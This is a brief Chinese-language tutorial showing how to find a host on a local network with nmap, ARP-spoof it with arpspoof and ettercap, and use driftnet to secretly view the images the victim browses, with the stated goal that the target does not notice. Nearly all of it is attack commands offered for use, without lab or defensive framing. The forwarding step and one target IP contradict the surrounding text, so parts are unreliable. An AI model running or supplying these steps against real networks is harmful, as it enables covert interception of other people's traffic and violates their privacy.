寻找目标主机

查看自己的ip地址、子网掩码等信息

ifconfig

O1D$7S619@7NGM9F(J(%WXX.png
可以看到，本机的ip地址为：192.168.75.129，网卡 eth0
接下来扫描内网中的主机：
nmap -sP 192.168.75.0/24
YK~Q_E$4QJ{%HA({J_W8}IO.png
目标主机的ip是：192.168.75.130
我们还可以使用以下命令来查看目标主机的操作系统信息：
nmap -O 192.168.75.130

先arp欺骗，获取流量

arpspoof -i eth0 -t 192.168.75.130 192.168.75.2

2(~KF$D`8L)@B_30GX335IO.png
使用这个命令获取到从 192.168.75.130 发往 192.168.75.2（路由器）的流量。
流量被拦截，目标主机这时打不开想浏览的网页。

我们想要做的是查看目标主机在线浏览的图片，并且让目标主机察觉不到。下面进行：

开启流量转发功能

使流量经过流程为：
A->B->C
A是路由器，B是攻击住机，C是目标机
1、首先开启流量转发功能
echo 0 >> /proc/sys/net/ipv4/ip_forward
2.使用arpspoof/ettercap，选一个进行arp欺骗。获取从192.168.75.2（路由器） 到 172.17.171.130（目标机）的流量。
ettercap -T -q -M ARP /192.168.75.130///

~AO5UWF0)2A$N7YZ3H7%)JP.png
3.打开另一个终端，使用driftnet进行流量监控，显示图片
driftnet -i eth0
4H2(DAUU$TM}`N}Q4`WO_JH.png
`65CK@1{~%WCNMH5%L7`BMJ.png